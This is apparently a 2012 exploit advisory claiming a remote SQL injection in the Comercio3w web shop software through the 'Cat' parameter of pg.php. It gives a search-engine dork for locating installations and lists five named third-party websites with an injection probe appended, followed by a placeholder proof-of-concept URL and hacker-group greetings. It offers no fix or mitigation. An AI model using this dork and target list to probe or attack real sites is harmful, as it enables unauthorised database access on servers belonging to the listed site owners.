Comercio3w suffers from a remote SQL injection vulnerability.
4bcd17c4a4816fdc45e626791bb9d64bbd827cb68a463ff292400b53c3bd005c
##################################################
# Exploit Title: Comercio3w [ Sqli ]
# Vendor: http://www.comercio3w.com/
# Date: 16/06/2012
# Author: xDarkSton3x
#Website: http://www.insecurityperu.org - http://xdarkstonex.blogspot.com
#Dork: inurl:pg.php?Cat=
# E-mail : xdarkston3x@msn.com
# Category: webapps
# Example Sites :
http://www.creatureloj.com/pg.php?Cat=%27
http://www.ips.cifes.com/pg.php?Cat=%27
http://www.adro.com.co/pg.php?Cat=%27
http://tellmetheway.net/pg.php?Cat=%27
http://fondodeinversiones.net/pg.php?Cat=%27
##################################################
[~]Exploit/p0c :
http://www.site.com/pg.php?Cat=[Sqli]
Greetz: [ InsecurityPeru ] - [ Rs4 - B4nz0k - FailSoft - W4rn1ng - Dedalo - Maztor ]